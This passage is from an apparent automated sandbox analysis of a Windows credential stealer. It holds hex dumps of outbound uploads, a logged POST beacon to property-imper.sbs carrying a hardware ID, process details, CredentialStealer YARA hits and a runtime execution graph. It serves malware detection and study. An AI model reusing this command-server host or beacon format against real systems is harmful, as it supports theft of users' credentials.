                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: b7 ff 88 79 e1 0d 68 c8 c1 50 d5 c6 e5 0b 81 0f 22 a8 2a 06 d3 83 9f cf 4d 34 d6 9d bd ec 00 48 0e c1 11 a1 eb 47 c6 b3 e8 09 0d e4 29 c1 56 fc 3b 09 1a 52 d3 7d b9 f3 4f 13 1b cd 3e 31 e4 c8 c3 93 b6 63 8a fd 1d 4f 43 8f 5e 33 bb c2 dd 31 ad cc 08 2f 7e f7 24 9e 82 8d c0 c4 ac 9b 38 2b b9 d4 45 84 74 ef b9 57 24 b8 ed ae 7b 02 7c ec b0 91 5e 81 e6 08 66 24 c0 77 fa 0c 3e a6 dd a9 62 c3 47 90 d4 17 9e ac 8d 3c 5b 25 29 b7 31 ee 5e 9d 3c 0d 33 a3 e1 31 00 6e 8e 2a 66 28 a6 0d 12 92 39 f7 a3 8b fe 37 3d d4 0c 84 ac 77 c8 d2 96 9f 20 89 8c bf 8c 5b aa 16 13 a9 0f d3 44 3d cf ad be 72 b3 44 1c 38 70 e4 07 a5 72 e8 07 45 04 b0 96 a5 c0 bf fc ac 8e 7f f8 fd f7 01 4a 5b ef 79 e0 46 4f 0b a7 09 30 3e a4 15 22 ca fe 39 60 be 7e 9e 20 08 ca e6 92 5b 44 25 a9 92 3b
                                                                                  Data Ascii: yhP"*M4HG)V;R}O>1cOC^31/~$8+EtW${|^f$w>bG<[%)1^<31n*f(97=w [D=rD8prEJ[yFO0>"9`~ [D%;
                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: 6a b4 4f 6d 2c 2c 4e 6c 7a 4f 70 16 39 3f 96 df ab 9e 8d 3a 77 fc 40 14 4d 49 bc da 8c 42 4f 34 b4 71 c5 88 b0 ff 1e c0 68 73 64 ef 62 dd 8d 3a 67 9f e8 73 d5 f4 7c 8e 0f 34 be f5 f3 b2 96 8d 30 3f 5a 2d a3 c2 03 e4 36 d9 c3 c7 ca a2 37 ac 07 15 cf 07 46 f8 0b ce 7e 91 c1 f2 df 3b 85 ed dc b7 97 91 a8 da 84 32 1d c3 dc 1b f8 22 3e 10 ce 57 98 1a 72 ae 6a 6e 16 cb b9 52 ab 39 06 2e a4 2d 72 8a d9 e8 31 5e a1 99 7b 14 5f 7c 8d 80 95 25 69 90 34 86 45 11 77 26 7a 79 8e ca b9 12 4e 1f 3b 37 48 51 54 22 51 14 33 14 db 93 6b 35 3f 6f 13 9c 3e 4b b3 b5 89 71 dd a5 32 6e f3 ed ab 9b d6 4f 53 3d 21 e2 94 da 4a 21 25 b1 91 bd b3 ca 45 36 74 cd e4 30 c5 47 90 54 ad 00 51 dd 66 91 32 6c 72 2e 8b d1 b9 4b 18 1b cf 75 4c 2d fe f1 26 64 e8 c7 3d 99 a9 ae 3f 44 59 d9 d3
                                                                                  Data Ascii: jOm,,NlzOp9?:w@MIBO4qhsdb:gs|40?Z-67F~;2">WrjnR9.-r1^{_|%i4Ew&zyN;7HQT"Q3k5?o>Kq2nOS=!J!%E6t0GTQf2lr.KuL-&d=?DY
                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: c0 c4 35 64 13 06 c8 b3 9f de e7 39 79 55 a8 04 15 ce 9d 37 61 25 78 5e f8 f7 04 08 7d 76 76 7c 92 87 0e 7e 84 16 2c 69 21 ea 89 51 ff 3e 83 d2 c1 8e c7 9d 6a 2d 11 80 67 0f 46 e9 a5 14 aa 3f dd 6e 63 9f ed 1e e3 dd 47 ab d8 14 a8 39 95 88 11 7b 34 f2 fd f6 9a 9d b8 8d 2c 27 e9 13 c0 8f 94 d0 7f 0e 8a f7 21 32 d3 e2 15 fe b9 9f f4 f7 f7 44 e7 c0 13 e0 73 f6 73 ed 23 f3 b6 36 fa 9c c9 ba 79 9d e3 7b e8 3c a0 62 ab 1a fe f6 61 28 ef f1 09 27 29 1d ad bf 56 88 0d df 53 98 4c be 55 4f b6 fd 17 ca 79 d6 0e 37 65 21 eb 8a 42 5e 64 88 c6 bd fb 7d 4b 7f e9 ad 80 77 e9 e9 aa 81 09 9a 1e dd 09 b6 02 9f 73 fc d8 31 68 71 2c 0a 35 4f dd b1 d9 1a 8b b9 92 86 b9 de cc 70 08 75 16 bc 79 60 cb 65 64 ec 58 22 97 85 38 cf 1f b7 30 be c9 15 5b 83 ee 35 ec 64 c4 f1 70 c9 d5
                                                                                  Data Ascii: 5d9yU7a%x^}vv|~,i!Q>j-gF?ncG9{4,'!2Dss#6y{<ba(')VSLUOy7e!B^d}Kws1hq,5Opuy`edX"80[5dp
                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: 2c 24 aa 41 99 aa 2e a8 ee bb f2 01 69 65 47 be 82 7d 93 a7 f6 4e 78 d0 5a d1 56 91 d5 cc bb db a9 ba 78 6b 32 df a1 d1 4f 2e 54 97 6a 58 be 89 a5 fb f1 97 c2 36 74 34 4d 46 45 2c fa bc f3 cb 8d 8c 02 e4 0c 5f 61 01 4a 1c 13 1b a1 80 e0 74 ce 64 c0 d4 09 ef cd 19 7d f8 9b 36 e1 b4 b4 1e f6 c2 1c 58 64 c8 d2 64 e0 54 34 02 2f 81 3c 28 8c 62 38 37 24 c4 c7 b9 a1 28 e1 41 49 bc 99 e7 89 bc eb da 23 82 05 1c fc 35 53 65 be 5a dd 49 ce cd 53 72 57 3e 60 52 af f1 80 b1 ab 2e 1c 21 84 89 d3 3d 38 d8 ef b0 a6 35 a5 e7 64 9d 56 77 43 55 6b 52 8d da 98 92 7c 4b 95 e9 3f 04 92 9a 7c 66 10 85 3d c5 45 36 03 c1 77 4f f6 be 88 e8 e5 72 f2 11 57 ba 71 46 13 e5 75 ef 7f 6b c0 ff 6c 76 cb 3f 80 17 6f 96 94 66 ed aa 4a 19 d0 36 74 7d fd a1 d5 11 9c ed ab 12 95 8f ba 3d 1c
                                                                                  Data Ascii: ,$A.ieG}NxZVxk2O.TjX6t4MFE,_aJtd}6XddT4/<(b87$(AI#5SeZISrW>`R.!=85dVwCUkR|K?|f=E6wOrWqFuklv?ofJ6t}=
                                                                                  2024-11-23 02:11:22 UTC15331OUTData Raw: 51 a2 7c 4a 80 8f bf be 34 c1 d4 a0 81 6c 7e 2e 50 db c4 48 4a 88 b7 fb 11 f1 12 78 44 92 94 f9 a5 88 14 c7 41 ac 98 d4 24 d4 0f 67 ed bd 71 ad f8 94 36 a8 f3 0a c5 7b e3 83 3b aa b7 8d fb ed 2f 41 4a dc 42 15 09 69 a2 8d 01 bf cf 10 4e 40 48 70 4c 3e 7b 59 90 06 cf 91 93 0f 35 88 87 72 6a ec c3 43 fa dc a9 5c f3 e9 73 96 4f 09 c2 e0 be a5 dc 1e e5 03 70 06 16 bd 73 87 2f 71 d1 28 59 5c ac fb 06 db 51 7c fa c8 53 60 8a f2 9b dd 2e b8 8e d2 36 d1 3b 99 b2 77 8d 8d dd cb 8d b8 22 fa a6 00 88 f0 3c 7a 19 86 60 93 de c2 a6 07 70 6f 7f 2e 5d 32 e0 2e 21 1e 5d cd 3a 67 54 47 38 12 c3 93 55 d1 6e 16 32 83 68 10 f2 30 32 31 7e 2d d8 91 7c e8 3b 55 62 e2 40 c3 af 62 e2 b5 2c 0d ab d1 b4 bb 72 ef b1 8c e3 3f 5b b0 79 55 2e 0e a1 37 8f 3a 11 60 f0 7f 42 a0 75 55 f0
                                                                                  Data Ascii: Q|J4l~.PHJxDA$gq6{;/AJBiN@HpL>{Y5rjC\sOps/q(Y\Q|S`.6;w"<z`po.]2.!]:gTG8Un2h021~-|;Ub@b,r?[yU.7:`BuU
                                                                                  2024-11-23 02:11:24 UTC1025INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 02:11:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=201mdg6q6tbpil0brompc27tj4; expires=Tue, 18-Mar-2025 19:58:03 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FgfX8X2fQ2j%2Fdj%2FUmaFp8CnluO%2BbZoNhVbYExp8f6gQsSV0VPD4KuSWDvK9SvdQygRJIEg2sqJvbgR0k%2BT3xOC26ijiegwsIG%2BfnwDLuPp7AMakmMUq9Nix5Sk7q29XzykglQtw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e6da0d0fb425e78-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1581&sent=333&recv=594&lost=0&retrans=0&sent_bytes=2845&recv_bytes=571623&delivery_rate=1787025&cwnd=252&unsent_bytes=0&cid=4d48a8f3f28eb4e8&ts=2752&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.549732104.21.33.116443768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-23 02:11:26 UTC266OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 87
                                                                                  Host: property-imper.sbs
                                                                                  2024-11-23 02:11:26 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 26 6a 3d 26 68 77 69 64 3d 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37
                                                                                  Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@benzoyolo&j=&hwid=D715AC3D088C75D41948C506DC811777
                                                                                  2024-11-23 02:11:26 UTC1016INHTTP/1.1 200 OK
                                                                                  Date: Sat, 23 Nov 2024 02:11:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=ib148sgdniqsrqphcjaskhl9l5; expires=Tue, 18-Mar-2025 19:58:05 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQrtJkJvOw4E1DqmJ1m6wej%2BQzLEZzrNy5mbrSBwITQEkA%2BZMuJ8%2FohnT0kwlzz1DQwOXk2r31Lzha24qvjjELOo0qxeZzUuLvXY4nJ%2BZ9Ttl5e2gJsxoWev8P5c49yGOgOHvQs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e6da0eadb1e447a-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14298&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=989&delivery_rate=1634023&cwnd=219&unsent_bytes=0&cid=b31a13681fcc73e3&ts=740&x=0"
                                                                                  2024-11-23 02:11:26 UTC126INData Raw: 37 38 0d 0a 68 36 48 59 31 52 52 4b 6c 6f 50 77 67 2f 46 6d 4f 72 64 64 33 2f 43 45 34 43 70 6c 74 30 73 53 79 55 41 47 45 57 4a 70 6b 35 62 63 32 76 71 67 4e 6e 43 30 36 34 54 33 67 56 78 6d 6d 41 48 77 77 62 44 58 42 46 47 43 5a 53 62 2b 62 6a 34 67 50 6b 62 77 2b 65 6e 4a 74 36 5a 67 5a 50 50 37 6c 61 48 64 52 46 7a 44 66 2b 58 41 71 4d 4a 50 52 34 31 37 62 35 51 3d 0d 0a
                                                                                  Data Ascii: 78h6HY1RRKloPwg/FmOrdd3/CE4Cplt0sSyUAGEWJpk5bc2vqgNnC064T3gVxmmAHwwbDXBFGCZSb+bj4gPkbw+enJt6ZgZPP7laHdRFzDf+XAqMJPR417b5Q=
                                                                                  2024-11-23 02:11:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:21:11:04
                                                                                  Start date:22/11/2024
                                                                                  Path:C:\Users\user\Desktop\Script.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Script.exe"
                                                                                  Imagebase:0x9a0000
                                                                                  File size:709'632 bytes
                                                                                  MD5 hash:E9C36F6A03694C88081409D38D76B9E8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:21:11:04
                                                                                  Start date:22/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:21:11:05
                                                                                  Start date:22/11/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                  Imagebase:0x9d0000
                                                                                  File size:43'016 bytes
                                                                                  MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2214373366.0000000002EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2214338243.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:21:11:05
                                                                                  Start date:22/11/2024
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1224
                                                                                  Imagebase:0x730000
                                                                                  File size:483'680 bytes
                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:13%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:8.1%
                                                                                    Total number of Nodes:1502
                                                                                    Total number of Limit Nodes:10
                                                                                    execution_graph 13066 6e0c33cd 13077 6e0c53ba 13066->13077 13072 6e0c4493 _free 14 API calls 13074 6e0c3419 13072->13074 13075 6e0c4493 _free 14 API calls 13076 6e0c33ea 13075->13076 13076->13072 13078 6e0c33df 13077->13078 13079 6e0c53c3 13077->13079 13083 6e0c587b GetEnvironmentStringsW 13078->13083 13112 6e0c3f54 13079->13112 13084 6e0c58e8 13083->13084 13085 6e0c5892 13083->13085 13086 6e0c33e4 13084->13086 13087 6e0c58f1 FreeEnvironmentStringsW 13084->13087 13088 6e0c578d ___scrt_uninitialize_crt WideCharToMultiByte 13085->13088 13086->13076 13095 6e0c341f 13086->13095 13087->13086 13089 6e0c58ab 13088->13089 13089->13084 13090 6e0c680c 15 API calls 13089->13090 13091 6e0c58bb 13090->13091 13092 6e0c58d3 13091->13092 13093 6e0c578d ___scrt_uninitialize_crt WideCharToMultiByte 13091->13093 13094 6e0c4493 _free 14 API calls 13092->13094 13093->13092 13094->13084 13096 6e0c3434 13095->13096 13097 6e0c4436 __dosmaperr 14 API calls 13096->13097 13102 6e0c345b 13097->13102 13098 6e0c4493 _free 14 API calls 13100 6e0c33f5 13098->13100 13099 6e0c34c0 13099->13098 13100->13075 13101 6e0c4436 __dosmaperr 14 API calls 13101->13102 13102->13099 13102->13101 13103 6e0c34c2 13102->13103 13107 6e0c34e2 13102->13107 13110 6e0c4493 _free 14 API calls 13102->13110 13286 6e0c391f 13102->13286 13105 6e0c34ef 14 API calls 13103->13105 13106 6e0c34c8 13105->13106 13108 6e0c4493 _free 14 API calls 13106->13108 13109 6e0c4376 __fassign 11 API calls 13107->13109 13108->13099 13111 6e0c34ee 13109->13111 13110->13102 13113 6e0c3f5f 13112->13113 13114 6e0c3f65 13112->13114 13116 6e0c5be1 __dosmaperr 6 API calls 13113->13116 13115 6e0c5c20 __dosmaperr 6 API calls 13114->13115 13136 6e0c3f6b 13114->13136 13117 6e0c3f7f 13115->13117 13116->13114 13118 6e0c4436 __dosmaperr 14 API calls 13117->13118 13117->13136 13120 6e0c3f8f 13118->13120 13119 6e0c3979 __fassign 37 API calls 13121 6e0c3fed 13119->13121 13122 6e0c3fac 13120->13122 13123 6e0c3f97 13120->13123 13126 6e0c5c20 __dosmaperr 6 API calls 13122->13126 13125 6e0c5c20 __dosmaperr 6 API calls 13123->13125 13124 6e0c3fe4 13137 6e0c5206 13124->13137 13127 6e0c3fa3 13125->13127 13128 6e0c3fb8 13126->13128 13133 6e0c4493 _free 14 API calls 13127->13133 13129 6e0c3fbc 13128->13129 13130 6e0c3fcb 13128->13130 13131 6e0c5c20 __dosmaperr 6 API calls 13129->13131 13132 6e0c3c99 __dosmaperr 14 API calls 13130->13132 13131->13127 13134 6e0c3fd6 13132->13134 13133->13136 13135 6e0c4493 _free 14 API calls 13134->13135 13135->13136 13136->13119 13136->13124 13138 6e0c531a __fassign 37 API calls 13137->13138 13139 6e0c5219 13138->13139 13156 6e0c4fb0 13139->13156 13142 6e0c5232 13142->13078 13143 6e0c680c 15 API calls 13144 6e0c5243 13143->13144 13155 6e0c5275 13144->13155 13163 6e0c5415 13144->13163 13146 6e0c4493 _free 14 API calls 13148 6e0c5283 13146->13148 13148->13078 13149 6e0c5270 13151 6e0c4423 __dosmaperr 14 API calls 13149->13151 13150 6e0c528b 13152 6e0c52b7 13150->13152 13153 6e0c4493 _free 14 API calls 13150->13153 13151->13155 13152->13155 13174 6e0c4ea2 13152->13174 13153->13152 13155->13146 13157 6e0c39bd __fassign 37 API calls 13156->13157 13158 6e0c4fc2 13157->13158 13159 6e0c4fd1 GetOEMCP 13158->13159 13160 6e0c4fe3 13158->13160 13162 6e0c4ffa 13159->13162 13161 6e0c4fe8 GetACP 13160->13161 13160->13162 13161->13162 13162->13142 13162->13143 13164 6e0c4fb0 39 API calls 13163->13164 13165 6e0c5435 13164->13165 13167 6e0c546f IsValidCodePage 13165->13167 13171 6e0c54ab __DllMainCRTStartup@12 13165->13171 13166 6e0c0fe0 _ValidateLocalCookies 5 API calls 13169 6e0c5268 13166->13169 13168 6e0c5481 13167->13168 13167->13171 13170 6e0c54b0 GetCPInfo 13168->13170 13173 6e0c548a __DllMainCRTStartup@12 13168->13173 13169->13149 13169->13150 13170->13171 13170->13173 13171->13166 13182 6e0c5086 13173->13182 13175 6e0c4eae ___scrt_is_nonwritable_in_current_image 13174->13175 13260 6e0c412a EnterCriticalSection 13175->13260 13177 6e0c4eb8 13261 6e0c4eef 13177->13261 13183 6e0c50ae GetCPInfo 13182->13183 13184 6e0c5177 13182->13184 13183->13184 13189 6e0c50c6 13183->13189 13185 6e0c0fe0 _ValidateLocalCookies 5 API calls 13184->13185 13186 6e0c5204 13185->13186 13186->13171 13193 6e0c7534 13189->13193 13192 6e0c7841 41 API calls 13192->13184 13194 6e0c39bd __fassign 37 API calls 13193->13194 13195 6e0c7554 13194->13195 13196 6e0c5711 __fassign MultiByteToWideChar 13195->13196 13198 6e0c7581 13196->13198 13197 6e0c7612 13199 6e0c0fe0 _ValidateLocalCookies 5 API calls 13197->13199 13198->13197 13202 6e0c680c 15 API calls 13198->13202 13204 6e0c75a7 __alloca_probe_16 __DllMainCRTStartup@12 13198->13204 13200 6e0c512e 13199->13200 13208 6e0c7841 13200->13208 13201 6e0c760c 13213 6e0c7637 13201->13213 13202->13204 13204->13201 13205 6e0c5711 __fassign MultiByteToWideChar 13204->13205 13206 6e0c75f5 13205->13206 13206->13201 13207 6e0c75fc GetStringTypeW 13206->13207 13207->13201 13209 6e0c39bd __fassign 37 API calls 13208->13209 13210 6e0c7854 13209->13210 13217 6e0c7657 13210->13217 13214 6e0c7654 13213->13214 13215 6e0c7643 13213->13215 13214->13197 13215->13214 13216 6e0c4493 _free 14 API calls 13215->13216 13216->13214 13218 6e0c7672 13217->13218 13219 6e0c5711 __fassign MultiByteToWideChar 13218->13219 13222 6e0c76b6 13219->13222 13220 6e0c781b 13221 6e0c0fe0 _ValidateLocalCookies 5 API calls 13220->13221 13223 6e0c514f 13221->13223 13222->13220 13225 6e0c680c 15 API calls 13222->13225 13229 6e0c76db __alloca_probe_16 13222->13229 13223->13192 13224 6e0c7780 13228 6e0c7637 __freea 14 API calls 13224->13228 13225->13229 13226 6e0c5711 __fassign MultiByteToWideChar 13227 6e0c7721 13226->13227 13227->13224 13245 6e0c5cad 13227->13245 13228->13220 13229->13224 13229->13226 13232 6e0c778f 13234 6e0c680c 15 API calls 13232->13234 13238 6e0c77a1 __alloca_probe_16 13232->13238 13233 6e0c7757 13233->13224 13235 6e0c5cad 6 API calls 13233->13235 13234->13238 13235->13224 13236 6e0c780c 13237 6e0c7637 __freea 14 API calls 13236->13237 13237->13224 13238->13236 13239 6e0c5cad 6 API calls 13238->13239 13240 6e0c77e9 13239->13240 13240->13236 13241 6e0c578d ___scrt_uninitialize_crt WideCharToMultiByte 13240->13241 13242 6e0c7803 13241->13242 13242->13236 13243 6e0c7838 13242->13243 13244 6e0c7637 __freea 14 API calls 13243->13244 13244->13224 13251 6e0c5986 13245->13251 13248 6e0c5cbe 13248->13224 13248->13232 13248->13233 13250 6e0c5cfe LCMapStringW 13250->13248 13252 6e0c5a81 __dosmaperr 5 API calls 13251->13252 13253 6e0c599c 13252->13253 13253->13248 13254 6e0c5d0a 13253->13254 13257 6e0c59a0 13254->13257 13256 6e0c5d15 13256->13250 13258 6e0c5a81 __dosmaperr 5 API calls 13257->13258 13259 6e0c59b6 13258->13259 13259->13256 13260->13177 13271 6e0c5608 13261->13271 13263 6e0c4f11 13264 6e0c5608 25 API calls 13263->13264 13265 6e0c4f30 13264->13265 13266 6e0c4ec5 13265->13266 13267 6e0c4493 _free 14 API calls 13265->13267 13268 6e0c4ee3 13266->13268 13267->13266 13285 6e0c4172 LeaveCriticalSection 13268->13285 13270 6e0c4ed1 13270->13155 13272 6e0c5619 13271->13272 13281 6e0c5615 ___scrt_uninitialize_crt 13271->13281 13273 6e0c5620 13272->13273 13277 6e0c5633 __DllMainCRTStartup@12 13272->13277 13274 6e0c4423 __dosmaperr 14 API calls 13273->13274 13275 6e0c5625 13274->13275 13276 6e0c4366 __fassign 25 API calls 13275->13276 13276->13281 13278 6e0c566a 13277->13278 13279 6e0c5661 13277->13279 13277->13281 13278->13281 13283 6e0c4423 __dosmaperr 14 API calls 13278->13283 13280 6e0c4423 __dosmaperr 14 API calls 13279->13280 13282 6e0c5666 13280->13282 13281->13263 13284 6e0c4366 __fassign 25 API calls 13282->13284 13283->13282 13284->13281 13285->13270 13287 6e0c392c 13286->13287 13288 6e0c393a 13286->13288 13287->13288 13293 6e0c3951 13287->13293 13289 6e0c4423 __dosmaperr 14 API calls 13288->13289 13290 6e0c3942 13289->13290 13291 6e0c4366 __fassign 25 API calls 13290->13291 13292 6e0c394c 13291->13292 13292->13102 13293->13292 13294 6e0c4423 __dosmaperr 14 API calls 13293->13294 13294->13290 13376 6e0c30c8 13377 6e0c30df 13376->13377 13387 6e0c30d8 13376->13387 13378 6e0c3100 13377->13378 13379 6e0c30ea 13377->13379 13380 6e0c53ba 47 API calls 13378->13380 13382 6e0c4423 __dosmaperr 14 API calls 13379->13382 13381 6e0c3106 13380->13381 13400 6e0c4e01 GetModuleFileNameW 13381->13400 13384 6e0c30ef 13382->13384 13386 6e0c4366 __fassign 25 API calls 13384->13386 13386->13387 13390 6e0c3372 14 API calls 13391 6e0c315b 13390->13391 13392 6e0c3164 13391->13392 13393 6e0c3170 13391->13393 13394 6e0c4423 __dosmaperr 14 API calls 13392->13394 13395 6e0c31fe 37 API calls 13393->13395 13399 6e0c3169 13394->13399 13396 6e0c3188 13395->13396 13398 6e0c4493 _free 14 API calls 13396->13398 13396->13399 13397 6e0c4493 _free 14 API calls 13397->13387 13398->13399 13399->13397 13401 6e0c4e30 GetLastError 13400->13401 13402 6e0c4e41 13400->13402 13403 6e0c43ed __dosmaperr 14 API calls 13401->13403 13404 6e0c4b7a 37 API calls 13402->13404 13405 6e0c4e3c 13403->13405 13406 6e0c4e72 13404->13406 13408 6e0c0fe0 _ValidateLocalCookies 5 API calls 13405->13408 13416 6e0c4cff 13406->13416 13409 6e0c3119 13408->13409 13410 6e0c31fe 13409->13410 13412 6e0c3223 13410->13412 13414 6e0c3283 13412->13414 13441 6e0c56e0 13412->13441 13413 6e0c314e 13413->13390 13414->13413 13415 6e0c56e0 37 API calls 13414->13415 13415->13414 13417 6e0c4d0c 13416->13417 13418 6e0c4d1b 13416->13418 13417->13405 13419 6e0c4d48 13418->13419 13421 6e0c4d23 13418->13421 13420 6e0c578d ___scrt_uninitialize_crt WideCharToMultiByte 13419->13420 13422 6e0c4d58 13420->13422 13421->13417 13437 6e0c4dc6 13421->13437 13424 6e0c4d5f GetLastError 13422->13424 13425 6e0c4d75 13422->13425 13426 6e0c43ed __dosmaperr 14 API calls 13424->13426 13427 6e0c4d86 13425->13427 13429 6e0c4dc6 14 API calls 13425->13429 13428 6e0c4d6b 13426->13428 13427->13417 13430 6e0c578d ___scrt_uninitialize_crt WideCharToMultiByte 13427->13430 13431 6e0c4423 __dosmaperr 14 API calls 13428->13431 13429->13427 13432 6e0c4d9e 13430->13432 13431->13417 13432->13417 13433 6e0c4da5 GetLastError 13432->13433 13434 6e0c43ed __dosmaperr 14 API calls 13433->13434 13435 6e0c4db1 13434->13435 13436 6e0c4423 __dosmaperr 14 API calls 13435->13436 13436->13417 13438 6e0c4dd1 13437->13438 13439 6e0c4423 __dosmaperr 14 API calls 13438->13439 13440 6e0c4dda 13439->13440 13440->13417 13444 6e0c5689 13441->13444 13445 6e0c39bd __fassign 37 API calls 13444->13445 13446 6e0c569d 13445->13446 13446->13412 13343 6e0c788a 13344 6e0c53ba 47 API calls 13343->13344 13345 6e0c788f 13344->13345 13295 6e0c37c4 13296 6e0c4493 _free 14 API calls 13295->13296 13297 6e0c37d2 13296->13297 13298 6e0c4493 _free 14 API calls 13297->13298 13299 6e0c37e5 13298->13299 13300 6e0c4493 _free 14 API calls 13299->13300 13301 6e0c37f6 13300->13301 13302 6e0c4493 _free 14 API calls 13301->13302 13303 6e0c3807 13302->13303 13482 6e0c3547 13483 6e0c3559 13482->13483 13484 6e0c355f 13482->13484 13485 6e0c34ef 14 API calls 13483->13485 13485->13484 12915 6e0c5f81 12918 6e0c5f86 12915->12918 12917 6e0c5fa9 12918->12917 12919 6e0c7a2c 12918->12919 12920 6e0c7a5b 12919->12920 12921 6e0c7a39 12919->12921 12920->12918 12922 6e0c7a55 12921->12922 12923 6e0c7a47 DeleteCriticalSection 12921->12923 12924 6e0c4493 _free 14 API calls 12922->12924 12923->12922 12923->12923 12924->12920 12474 6e0c4683 12475 6e0c4693 12474->12475 12484 